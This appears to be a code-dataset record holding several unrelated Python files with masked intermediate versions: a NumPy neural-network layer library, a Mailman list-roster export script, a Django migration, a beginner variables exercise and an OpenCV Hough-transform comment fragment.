"step-2": "<mask token>\n\n\nclass FC(Layer):\n <mask token>\n\n def forward(self, x):\n self.x = x.copy()\n self.m, self.n = x.shape\n return np.dot(self.x, self.W) + self.b\n\n def backprop(self, back_grad):\n self.grad_W = np.dot(self.x.T, back_grad) + self.l2 * self.W\n self.grad_b = np.dot(np.ones(self.m), back_grad)\n self.grad = np.dot(back_grad, self.W.T)\n return self.grad\n\n def l_rate(self):\n lrate = self.alpha_0 * self.decay ** np.floor((1 + self.count) /\n self.epoch_drop)\n self.count += 1\n return lrate\n <mask token>\n <mask token>\n\n\nclass Sigmoid(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n self.sig_res = 1 / (1 + np.exp(-x))\n return self.sig_res\n\n def backprop(self, back_grad):\n grad = back_grad * self.sig_res * (1 - self.sig_res)\n return grad\n\n\nclass Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, 0)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = 0\n return grad\n\n\nclass Leaky_Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, self.x * 0.01)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = grad[self.x < 0] * 0.01\n return grad\n\n\nclass Tanh(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n self.tanh = np.tanh(x)\n return self.tanh\n\n def backprop(self, back_grad):\n grad = back_grad * (1 - self.tanh ** 2)\n return grad\n\n\nclass Arctan(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.arctan(self.x)\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + self.x ** 2)\n return grad\n\n\nclass SoftPlus(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.log(1 + np.exp(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.exp(-self.x))\n return grad\n\n\nclass SoftSign(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return self.x / (1 + np.abs(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.abs(self.x) ** 2)\n return grad\n\n\nclass Softmax(Layer):\n\n def forward(self, x, y):\n self.x = x.copy() - x.max(axis=1).reshape(-1, 1)\n self.y = y.copy()\n self.m, self.n = self.x.shape\n self.denom = np.sum(np.exp(x), axis=1).reshape((-1, 1))\n self.softmax = np.exp(x) / self.denom\n loss = 0\n for i in range(self.m):\n loss -= np.log(self.softmax[i, y[i]])\n return loss / self.m\n\n def dirac(self, a, b):\n return 1 if a == b else 0\n\n def backprop(self):\n grad = np.zeros([self.m, self.n])\n for i in range(self.m):\n for j in range(self.n):\n grad[i, j] = (self.softmax[i, j] - self.dirac(j, self.y[i])\n ) / self.m\n return grad\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FC(Layer):\n\n def __init__(self, W, b, lr, decay, epoch_drop, l2=0):\n self.W = W.copy()\n self.b = b.copy()\n self.alpha_0 = lr\n self.decay = decay\n self.epoch_drop = epoch_drop\n self.l2 = l2\n self.count = 0\n\n def forward(self, x):\n self.x = x.copy()\n self.m, self.n = x.shape\n return np.dot(self.x, self.W) + self.b\n\n def backprop(self, back_grad):\n self.grad_W = np.dot(self.x.T, back_grad) + self.l2 * self.W\n self.grad_b = np.dot(np.ones(self.m), back_grad)\n self.grad = np.dot(back_grad, self.W.T)\n return self.grad\n\n def l_rate(self):\n lrate = self.alpha_0 * self.decay ** np.floor((1 + self.count) /\n self.epoch_drop)\n self.count += 1\n return lrate\n\n def update(self):\n lr = self.l_rate()\n self.W -= lr * self.grad_W\n self.b -= lr * self.grad_b\n\n @property\n def need_update(self):\n return True\n\n\nclass Sigmoid(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n self.sig_res = 1 / (1 + np.exp(-x))\n return self.sig_res\n\n def backprop(self, back_grad):\n grad = back_grad * self.sig_res * (1 - self.sig_res)\n return grad\n\n\nclass Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, 0)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = 0\n return grad\n\n\nclass Leaky_Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, self.x * 0.01)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = grad[self.x < 0] * 0.01\n return grad\n\n\nclass Tanh(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n self.tanh = np.tanh(x)\n return self.tanh\n\n def backprop(self, back_grad):\n grad = back_grad * (1 - self.tanh ** 2)\n return grad\n\n\nclass Arctan(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.arctan(self.x)\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + self.x ** 2)\n return grad\n\n\nclass SoftPlus(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.log(1 + np.exp(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.exp(-self.x))\n return grad\n\n\nclass SoftSign(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return self.x / (1 + np.abs(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.abs(self.x) ** 2)\n return grad\n\n\nclass Softmax(Layer):\n\n def forward(self, x, y):\n self.x = x.copy() - x.max(axis=1).reshape(-1, 1)\n self.y = y.copy()\n self.m, self.n = self.x.shape\n self.denom = np.sum(np.exp(x), axis=1).reshape((-1, 1))\n self.softmax = np.exp(x) / self.denom\n loss = 0\n for i in range(self.m):\n loss -= np.log(self.softmax[i, y[i]])\n return loss / self.m\n\n def dirac(self, a, b):\n return 1 if a == b else 0\n\n def backprop(self):\n grad = np.zeros([self.m, self.n])\n for i in range(self.m):\n for j in range(self.n):\n grad[i, j] = (self.softmax[i, j] - self.dirac(j, self.y[i])\n ) / self.m\n return grad\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Layer:\n <mask token>\n\n @property\n def need_update(self):\n return False\n\n\nclass FC(Layer):\n\n def __init__(self, W, b, lr, decay, epoch_drop, l2=0):\n self.W = W.copy()\n self.b = b.copy()\n self.alpha_0 = lr\n self.decay = decay\n self.epoch_drop = epoch_drop\n self.l2 = l2\n self.count = 0\n\n def forward(self, x):\n self.x = x.copy()\n self.m, self.n = x.shape\n return np.dot(self.x, self.W) + self.b\n\n def backprop(self, back_grad):\n self.grad_W = np.dot(self.x.T, back_grad) + self.l2 * self.W\n self.grad_b = np.dot(np.ones(self.m), back_grad)\n self.grad = np.dot(back_grad, self.W.T)\n return self.grad\n\n def l_rate(self):\n lrate = self.alpha_0 * self.decay ** np.floor((1 + self.count) /\n self.epoch_drop)\n self.count += 1\n return lrate\n\n def update(self):\n lr = self.l_rate()\n self.W -= lr * self.grad_W\n self.b -= lr * self.grad_b\n\n @property\n def need_update(self):\n return True\n\n\nclass Sigmoid(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n self.sig_res = 1 / (1 + np.exp(-x))\n return self.sig_res\n\n def backprop(self, back_grad):\n grad = back_grad * self.sig_res * (1 - self.sig_res)\n return grad\n\n\nclass Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, 0)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = 0\n return grad\n\n\nclass Leaky_Relu(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, self.x * 0.01)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = grad[self.x < 0] * 0.01\n return grad\n\n\nclass Tanh(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n self.tanh = np.tanh(x)\n return self.tanh\n\n def backprop(self, back_grad):\n grad = back_grad * (1 - self.tanh ** 2)\n return grad\n\n\nclass Arctan(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.arctan(self.x)\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + self.x ** 2)\n return grad\n\n\nclass SoftPlus(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return np.log(1 + np.exp(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.exp(-self.x))\n return grad\n\n\nclass SoftSign(Layer):\n\n def forward(self, x):\n self.x = x.copy()\n return self.x / (1 + np.abs(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.abs(self.x) ** 2)\n return grad\n\n\nclass Softmax(Layer):\n\n def forward(self, x, y):\n self.x = x.copy() - x.max(axis=1).reshape(-1, 1)\n self.y = y.copy()\n self.m, self.n = self.x.shape\n self.denom = np.sum(np.exp(x), axis=1).reshape((-1, 1))\n self.softmax = np.exp(x) / self.denom\n loss = 0\n for i in range(self.m):\n loss -= np.log(self.softmax[i, y[i]])\n return loss / self.m\n\n def dirac(self, a, b):\n return 1 if a == b else 0\n\n def backprop(self):\n grad = np.zeros([self.m, self.n])\n for i in range(self.m):\n for j in range(self.n):\n grad[i, j] = (self.softmax[i, j] - self.dirac(j, self.y[i])\n ) / self.m\n return grad\n\n\n<mask token>\n",
"step-5": "import numpy as np\n\n\nclass Layer:\n def __init__(self):\n pass\n\n @property\n def need_update(self):\n return False\n\n\nclass FC(Layer):\n def __init__(self, W, b, lr, decay, epoch_drop, l2=0):\n self.W = W.copy()\n self.b = b.copy()\n self.alpha_0 = lr\n self.decay = decay\n self.epoch_drop = epoch_drop\n self.l2 = l2\n self.count = 0\n\n def forward(self, x):\n self.x = x.copy()\n self.m, self.n = x.shape\n return np.dot(self.x, self.W) + self.b\n\n def backprop(self, back_grad):\n self.grad_W = np.dot(self.x.T, back_grad) + self.l2 * self.W\n self.grad_b = np.dot(np.ones(self.m), back_grad)\n self.grad = np.dot(back_grad, self.W.T)\n return self.grad\n\n def l_rate(self):\n lrate = self.alpha_0 * \\\n (self.decay ** (np.floor((1 + self.count) / self.epoch_drop)))\n self.count += 1\n return lrate\n\n def update(self):\n lr = self.l_rate()\n self.W -= lr * self.grad_W\n self.b -= lr * self.grad_b\n\n @property\n def need_update(self):\n return True\n\n\nclass Sigmoid(Layer):\n def forward(self, x):\n self.x = x.copy()\n self.sig_res = 1 / (1 + np.exp(-x))\n return self.sig_res\n\n def backprop(self, back_grad):\n grad = back_grad * self.sig_res * (1 - self.sig_res)\n return grad\n\n\nclass Relu(Layer):\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, 0)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = 0\n return grad\n\n\nclass Leaky_Relu(Layer):\n def forward(self, x):\n self.x = x.copy()\n return np.maximum(x, self.x * 0.01)\n\n def backprop(self, back_grad):\n grad = back_grad.copy()\n grad[self.x < 0] = grad[self.x < 0] * 0.01\n return grad\n\n\nclass Tanh(Layer):\n def forward(self, x):\n self.x = x.copy()\n self.tanh = np.tanh(x)\n return self.tanh\n\n def backprop(self, back_grad):\n grad = back_grad * (1 - self.tanh ** 2)\n return grad\n\n\nclass Arctan(Layer):\n def forward(self, x):\n self.x = x.copy()\n return np.arctan(self.x)\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + self.x ** 2)\n return grad\n\n\nclass SoftPlus(Layer):\n def forward(self, x):\n self.x = x.copy()\n return np.log(1 + np.exp(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.exp(-self.x))\n return grad\n\n\nclass SoftSign(Layer):\n def forward(self, x):\n self.x = x.copy()\n return self.x / (1 + np.abs(self.x))\n\n def backprop(self, back_grad):\n grad = back_grad / (1 + np.abs(self.x) ** 2)\n return grad\n\n\nclass Softmax(Layer):\n def forward(self, x, y):\n self.x = (x.copy() - x.max(axis=1).reshape(-1, 1))\n # Avoiding overflow of exp(),\n # This operation doesn't change the output of CE\n self.y = y.copy()\n self.m, self.n = self.x.shape\n self.denom = np.sum(np.exp(x), axis=1).reshape((-1, 1))\n self.softmax = np.exp(x) / self.denom\n loss = 0\n for i in range(self.m):\n loss -= np.log(self.softmax[i, y[i]])\n return loss / self.m\n\n def dirac(self, a, b):\n return 1 if a == b else 0\n\n def backprop(self):\n grad = np.zeros([self.m, self.n])\n for i in range(self.m):\n for j in range(self.n):\n grad[i, j] = (self.softmax[i, j] -\n self.dirac(j, self.y[i])) / self.m\n return grad\n\n\ndef get_act_func(layer_name):\n activation_function_dict = {\n \"arctan\": Arctan,\n \"l_relu\": Leaky_Relu,\n \"relu\": Relu,\n \"sigmoid\": Sigmoid,\n \"tanh\": Tanh,\n \"softplus\": SoftPlus,\n \"softsign\": SoftSign\n }\n return activation_function_dict[layer_name]()\n",
"step-ids": [
19,
29,
32,
34,
38
]
}
|
[
19,
29,
32,
34,
38
] |
import messages
import os
import requests
from bs4 import BeautifulSoup
URL = "https://mailman.kcl.ac.uk/mailman/"
ADMIN = "admin/"
ROSTER = "roster/"
OUTPUT_FOLDER = "../output/"
def makeoutput(path):
if os.path.exists(path):
pass
else:
os.mkdir(path)
def mailinglist_cookies(mailinglist, password): # this opens up the admin page, enters the password, and saves the returned cookie to be passed to the next request
try:
cookie_request = requests.post(URL+ ADMIN + mailinglist, data = {'adminpw':password})
cookie_request.raise_for_status()
return cookie_request.cookies
except: # raises exception if the password is incorrect (or any other 4XX error)
print(messages.error_message)
return None
def make_roster(mailinglist, cookies): # takes the cookie from the cookie request and requests the roster
roster_request = requests.get(URL+ ROSTER + mailinglist, cookies = cookies)
roster_soup = BeautifulSoup(roster_request.text,'html.parser')
roster_result_set = roster_soup.find_all('a')[:-4] # the last 4 links on the page are admin links
roster = []
for r in roster_result_set:
roster.append(r.text.replace(' at ','@')) #the mailman list inexplicably uses a stupid ' at ' display format
return roster
def main():
makeoutput(OUTPUT_FOLDER)
print(messages.welcome_message)
while True:
mailinglist = input("What's the name of the mailing list you want to download?> ")
password = input("What is the list admin password?> ")
filename = OUTPUT_FOLDER + mailinglist + '-mailinglist.txt'
cookies = mailinglist_cookies(mailinglist, password)
if cookies != None:
roster = make_roster(mailinglist, cookies)
for count, email in enumerate(roster,1):
print(count,"/",len(roster))
with open(filename, 'a') as output:
output.write(email + ';\n')
print("Saved", len(roster), "email addresses in", os.path.abspath(filename))
input("press enter to close")
break
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "0e337ce21450e0fdb7688183d0542ebf902a9614",
"index": 1293,
"step-1": "<mask token>\n\n\ndef makeoutput(path):\n if os.path.exists(path):\n pass\n else:\n os.mkdir(path)\n\n\ndef mailinglist_cookies(mailinglist, password):\n try:\n cookie_request = requests.post(URL + ADMIN + mailinglist, data={\n 'adminpw': password})\n cookie_request.raise_for_status()\n return cookie_request.cookies\n except:\n print(messages.error_message)\n return None\n\n\ndef make_roster(mailinglist, cookies):\n roster_request = requests.get(URL + ROSTER + mailinglist, cookies=cookies)\n roster_soup = BeautifulSoup(roster_request.text, 'html.parser')\n roster_result_set = roster_soup.find_all('a')[:-4]\n roster = []\n for r in roster_result_set:\n roster.append(r.text.replace(' at ', '@'))\n return roster\n\n\ndef main():\n makeoutput(OUTPUT_FOLDER)\n print(messages.welcome_message)\n while True:\n mailinglist = input(\n \"What's the name of the mailing list you want to download?> \")\n password = input('What is the list admin password?> ')\n filename = OUTPUT_FOLDER + mailinglist + '-mailinglist.txt'\n cookies = mailinglist_cookies(mailinglist, password)\n if cookies != None:\n roster = make_roster(mailinglist, cookies)\n for count, email in enumerate(roster, 1):\n print(count, '/', len(roster))\n with open(filename, 'a') as output:\n output.write(email + ';\\n')\n print('Saved', len(roster), 'email addresses in', os.path.\n abspath(filename))\n input('press enter to close')\n break\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef makeoutput(path):\n if os.path.exists(path):\n pass\n else:\n os.mkdir(path)\n\n\ndef mailinglist_cookies(mailinglist, password):\n try:\n cookie_request = requests.post(URL + ADMIN + mailinglist, data={\n 'adminpw': password})\n cookie_request.raise_for_status()\n return cookie_request.cookies\n except:\n print(messages.error_message)\n return None\n\n\ndef make_roster(mailinglist, cookies):\n roster_request = requests.get(URL + ROSTER + mailinglist, cookies=cookies)\n roster_soup = BeautifulSoup(roster_request.text, 'html.parser')\n roster_result_set = roster_soup.find_all('a')[:-4]\n roster = []\n for r in roster_result_set:\n roster.append(r.text.replace(' at ', '@'))\n return roster\n\n\ndef main():\n makeoutput(OUTPUT_FOLDER)\n print(messages.welcome_message)\n while True:\n mailinglist = input(\n \"What's the name of the mailing list you want to download?> \")\n password = input('What is the list admin password?> ')\n filename = OUTPUT_FOLDER + mailinglist + '-mailinglist.txt'\n cookies = mailinglist_cookies(mailinglist, password)\n if cookies != None:\n roster = make_roster(mailinglist, cookies)\n for count, email in enumerate(roster, 1):\n print(count, '/', len(roster))\n with open(filename, 'a') as output:\n output.write(email + ';\\n')\n print('Saved', len(roster), 'email addresses in', os.path.\n abspath(filename))\n input('press enter to close')\n break\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\nURL = 'https://mailman.kcl.ac.uk/mailman/'\nADMIN = 'admin/'\nROSTER = 'roster/'\nOUTPUT_FOLDER = '../output/'\n\n\ndef makeoutput(path):\n if os.path.exists(path):\n pass\n else:\n os.mkdir(path)\n\n\ndef mailinglist_cookies(mailinglist, password):\n try:\n cookie_request = requests.post(URL + ADMIN + mailinglist, data={\n 'adminpw': password})\n cookie_request.raise_for_status()\n return cookie_request.cookies\n except:\n print(messages.error_message)\n return None\n\n\ndef make_roster(mailinglist, cookies):\n roster_request = requests.get(URL + ROSTER + mailinglist, cookies=cookies)\n roster_soup = BeautifulSoup(roster_request.text, 'html.parser')\n roster_result_set = roster_soup.find_all('a')[:-4]\n roster = []\n for r in roster_result_set:\n roster.append(r.text.replace(' at ', '@'))\n return roster\n\n\ndef main():\n makeoutput(OUTPUT_FOLDER)\n print(messages.welcome_message)\n while True:\n mailinglist = input(\n \"What's the name of the mailing list you want to download?> \")\n password = input('What is the list admin password?> ')\n filename = OUTPUT_FOLDER + mailinglist + '-mailinglist.txt'\n cookies = mailinglist_cookies(mailinglist, password)\n if cookies != None:\n roster = make_roster(mailinglist, cookies)\n for count, email in enumerate(roster, 1):\n print(count, '/', len(roster))\n with open(filename, 'a') as output:\n output.write(email + ';\\n')\n print('Saved', len(roster), 'email addresses in', os.path.\n abspath(filename))\n input('press enter to close')\n break\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import messages\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nURL = 'https://mailman.kcl.ac.uk/mailman/'\nADMIN = 'admin/'\nROSTER = 'roster/'\nOUTPUT_FOLDER = '../output/'\n\n\ndef makeoutput(path):\n if os.path.exists(path):\n pass\n else:\n os.mkdir(path)\n\n\ndef mailinglist_cookies(mailinglist, password):\n try:\n cookie_request = requests.post(URL + ADMIN + mailinglist, data={\n 'adminpw': password})\n cookie_request.raise_for_status()\n return cookie_request.cookies\n except:\n print(messages.error_message)\n return None\n\n\ndef make_roster(mailinglist, cookies):\n roster_request = requests.get(URL + ROSTER + mailinglist, cookies=cookies)\n roster_soup = BeautifulSoup(roster_request.text, 'html.parser')\n roster_result_set = roster_soup.find_all('a')[:-4]\n roster = []\n for r in roster_result_set:\n roster.append(r.text.replace(' at ', '@'))\n return roster\n\n\ndef main():\n makeoutput(OUTPUT_FOLDER)\n print(messages.welcome_message)\n while True:\n mailinglist = input(\n \"What's the name of the mailing list you want to download?> \")\n password = input('What is the list admin password?> ')\n filename = OUTPUT_FOLDER + mailinglist + '-mailinglist.txt'\n cookies = mailinglist_cookies(mailinglist, password)\n if cookies != None:\n roster = make_roster(mailinglist, cookies)\n for count, email in enumerate(roster, 1):\n print(count, '/', len(roster))\n with open(filename, 'a') as output:\n output.write(email + ';\\n')\n print('Saved', len(roster), 'email addresses in', os.path.\n abspath(filename))\n input('press enter to close')\n break\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "\nimport messages\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\n\nURL = \"https://mailman.kcl.ac.uk/mailman/\"\nADMIN = \"admin/\"\nROSTER = \"roster/\"\nOUTPUT_FOLDER = \"../output/\"\n\ndef makeoutput(path):\t\n\tif os.path.exists(path):\n\t\tpass\n\telse:\n\t\tos.mkdir(path)\n\ndef mailinglist_cookies(mailinglist, password): # this opens up the admin page, enters the password, and saves the returned cookie to be passed to the next request\n\ttry:\n\t\tcookie_request = requests.post(URL+ ADMIN + mailinglist, data = {'adminpw':password})\n\t\tcookie_request.raise_for_status()\n\t\treturn cookie_request.cookies \n\texcept: # raises exception if the password is incorrect (or any other 4XX error)\n\t\tprint(messages.error_message)\n\t\treturn None\n\ndef make_roster(mailinglist, cookies): # takes the cookie from the cookie request and requests the roster\n\troster_request = requests.get(URL+ ROSTER + mailinglist, cookies = cookies)\n\troster_soup = BeautifulSoup(roster_request.text,'html.parser')\n\troster_result_set = roster_soup.find_all('a')[:-4] # the last 4 links on the page are admin links\n\troster = []\n\tfor r in roster_result_set:\n\t\troster.append(r.text.replace(' at ','@')) #the mailman list inexplicably uses a stupid ' at ' display format\n\n\treturn roster\n\ndef main():\n\t\n\tmakeoutput(OUTPUT_FOLDER)\t\n\tprint(messages.welcome_message)\t\n\n\twhile True:\t\t\n\t\tmailinglist = input(\"What's the name of the mailing list you want to download?> \")\n\t\tpassword = input(\"What is the list admin password?> \")\n\t\tfilename = OUTPUT_FOLDER + mailinglist + '-mailinglist.txt'\n\n\t\tcookies = mailinglist_cookies(mailinglist, password)\n\t\tif cookies != None:\n\t\t\troster = make_roster(mailinglist, cookies)\t\t\n\t\t\tfor count, email in enumerate(roster,1):\n\t\t\t\t\n\t\t\t\tprint(count,\"/\",len(roster))\n\n\t\t\t\twith open(filename, 'a') as output:\n\t\t\t\t\toutput.write(email + ';\\n')\n\t\t\t\n\t\t\tprint(\"Saved\", len(roster), \"email addresses in\", os.path.abspath(filename))\n\t\t\tinput(\"press enter to close\")\n\t\t\tbreak\t\t\n\nif __name__ == '__main__':\n\tmain()",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
# Generated by Django 3.0.4 on 2020-03-27 11:42
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('web', '0005_remove_product_image'),
]
operations = [
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('price', models.FloatField()),
('duration_till', models.DateField()),
('total_amount', models.FloatField()),
('buyer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='consumer', to=settings.AUTH_USER_MODEL)),
('seller', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
normal
|
{
"blob_id": "c10e1cf2f1ce5b11d19ddddbfc3dc9652d830a3c",
"index": 1132,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('web', '0005_remove_product_image')]\n operations = [migrations.CreateModel(name='Subscription', fields=[('id',\n models.AutoField(primary_key=True, serialize=False)), ('price',\n models.FloatField()), ('duration_till', models.DateField()), (\n 'total_amount', models.FloatField()), ('buyer', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, related_name=\n 'consumer', to=settings.AUTH_USER_MODEL)), ('seller', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings\n .AUTH_USER_MODEL))])]\n",
"step-4": "from django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('web', '0005_remove_product_image')]\n operations = [migrations.CreateModel(name='Subscription', fields=[('id',\n models.AutoField(primary_key=True, serialize=False)), ('price',\n models.FloatField()), ('duration_till', models.DateField()), (\n 'total_amount', models.FloatField()), ('buyer', models.ForeignKey(\n on_delete=django.db.models.deletion.CASCADE, related_name=\n 'consumer', to=settings.AUTH_USER_MODEL)), ('seller', models.\n ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings\n .AUTH_USER_MODEL))])]\n",
"step-5": "# Generated by Django 3.0.4 on 2020-03-27 11:42\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('web', '0005_remove_product_image'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Subscription',\n fields=[\n ('id', models.AutoField(primary_key=True, serialize=False)),\n ('price', models.FloatField()),\n ('duration_till', models.DateField()),\n ('total_amount', models.FloatField()),\n ('buyer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='consumer', to=settings.AUTH_USER_MODEL)),\n ('seller', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
work_hours = 8
work_days = 5
pay_periods = 2
total = work_hours * work_days * pay_periods
rate = 17
pay = total * rate
print(pay)
# variables
name = "josh"
age = 30
# float
weight = 160.5
# list
kill_streak = [3, 5, 1, 9] # [90.9] list can contain sub lists
# range
players = list(range(1,10))
odds = list(range(1, 10, 2))
print(odds)
print(type(name), type(age), type(weight), type(kill_streak))
# dir(str)
# attributes
# help(str.upper)
# dir(__builtins__)
kill_streak_sum = sum(kill_streak)
length = len(kill_streak)
mean = kill_streak_sum / length
print(mean)
student_grades = [9.1, 8.8, 10.0, 7.7, 6.8, 8.0, 10.0, 8.1, 10.0, 9.9]
tens = student_grades.count(10)
print(tens)
# dictionary (key:value)
family = {"josh": 30, "jess": 31, "bailey": 1.5}
age_sum = sum(family.values())
family_size = len(family)
average_age = age_sum / family_size
print(average_age)
# Tuple like a dictionary but non-mutable
palette_one = ("#f1f1f1", "#333333", "#4287f5")
palette_two = ("#f5f5f5", "#454545", "#6dd46a")
palette_three = ("#f0fff0", "#c7c7c7", "#725fb0")
palettes = (palette_one, palette_two, palette_three)
color_codes = palettes
temperature_data = {"morning": (3.1, 2.0, 4.9), "noon": (1.2, 0.9, 3.4), "evening": (0.2, 0.1, 1.0)}
day_temperatures = temperature_data
|
normal
|
{
"blob_id": "af2ef3c77cefe675f3d30c3234401f0f9bda3505",
"index": 8916,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(pay)\n<mask token>\nprint(odds)\nprint(type(name), type(age), type(weight), type(kill_streak))\n<mask token>\nprint(mean)\n<mask token>\nprint(tens)\n<mask token>\nprint(average_age)\n<mask token>\n",
"step-3": "work_hours = 8\nwork_days = 5\npay_periods = 2\ntotal = work_hours * work_days * pay_periods\nrate = 17\npay = total * rate\nprint(pay)\nname = 'josh'\nage = 30\nweight = 160.5\nkill_streak = [3, 5, 1, 9]\nplayers = list(range(1, 10))\nodds = list(range(1, 10, 2))\nprint(odds)\nprint(type(name), type(age), type(weight), type(kill_streak))\nkill_streak_sum = sum(kill_streak)\nlength = len(kill_streak)\nmean = kill_streak_sum / length\nprint(mean)\nstudent_grades = [9.1, 8.8, 10.0, 7.7, 6.8, 8.0, 10.0, 8.1, 10.0, 9.9]\ntens = student_grades.count(10)\nprint(tens)\nfamily = {'josh': 30, 'jess': 31, 'bailey': 1.5}\nage_sum = sum(family.values())\nfamily_size = len(family)\naverage_age = age_sum / family_size\nprint(average_age)\npalette_one = '#f1f1f1', '#333333', '#4287f5'\npalette_two = '#f5f5f5', '#454545', '#6dd46a'\npalette_three = '#f0fff0', '#c7c7c7', '#725fb0'\npalettes = palette_one, palette_two, palette_three\ncolor_codes = palettes\ntemperature_data = {'morning': (3.1, 2.0, 4.9), 'noon': (1.2, 0.9, 3.4),\n 'evening': (0.2, 0.1, 1.0)}\nday_temperatures = temperature_data\n",
"step-4": "work_hours = 8\r\nwork_days = 5\r\npay_periods = 2\r\ntotal = work_hours * work_days * pay_periods\r\nrate = 17\r\npay = total * rate\r\n\r\nprint(pay)\r\n\r\n# variables\r\nname = \"josh\"\r\nage = 30\r\n# float\r\nweight = 160.5\r\n# list\r\nkill_streak = [3, 5, 1, 9] # [90.9] list can contain sub lists\r\n# range\r\nplayers = list(range(1,10))\r\nodds = list(range(1, 10, 2))\r\nprint(odds)\r\n\r\nprint(type(name), type(age), type(weight), type(kill_streak))\r\n\r\n# dir(str)\r\n# attributes\r\n# help(str.upper)\r\n\r\n# dir(__builtins__)\r\n\r\nkill_streak_sum = sum(kill_streak)\r\nlength = len(kill_streak)\r\nmean = kill_streak_sum / length\r\n\r\nprint(mean)\r\n\r\nstudent_grades = [9.1, 8.8, 10.0, 7.7, 6.8, 8.0, 10.0, 8.1, 10.0, 9.9]\r\ntens = student_grades.count(10)\r\n\r\nprint(tens)\r\n\r\n# dictionary (key:value)\r\nfamily = {\"josh\": 30, \"jess\": 31, \"bailey\": 1.5}\r\nage_sum = sum(family.values())\r\nfamily_size = len(family)\r\naverage_age = age_sum / family_size\r\n\r\nprint(average_age)\r\n\r\n# Tuple like a dictionary but non-mutable\r\npalette_one = (\"#f1f1f1\", \"#333333\", \"#4287f5\")\r\npalette_two = (\"#f5f5f5\", \"#454545\", \"#6dd46a\")\r\npalette_three = (\"#f0fff0\", \"#c7c7c7\", \"#725fb0\")\r\npalettes = (palette_one, palette_two, palette_three)\r\n\r\ncolor_codes = palettes\r\n\r\ntemperature_data = {\"morning\": (3.1, 2.0, 4.9), \"noon\": (1.2, 0.9, 3.4), \"evening\": (0.2, 0.1, 1.0)}\r\nday_temperatures = temperature_data\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
## Line detection with the Hough transform
# cv2.HoughLines(image, rho, theta, threshold, lines=None, srn=None, stn=None, min_theta=None, max_theta=None) => lines
# image : input edge image (an edge map produced by the Canny operator)
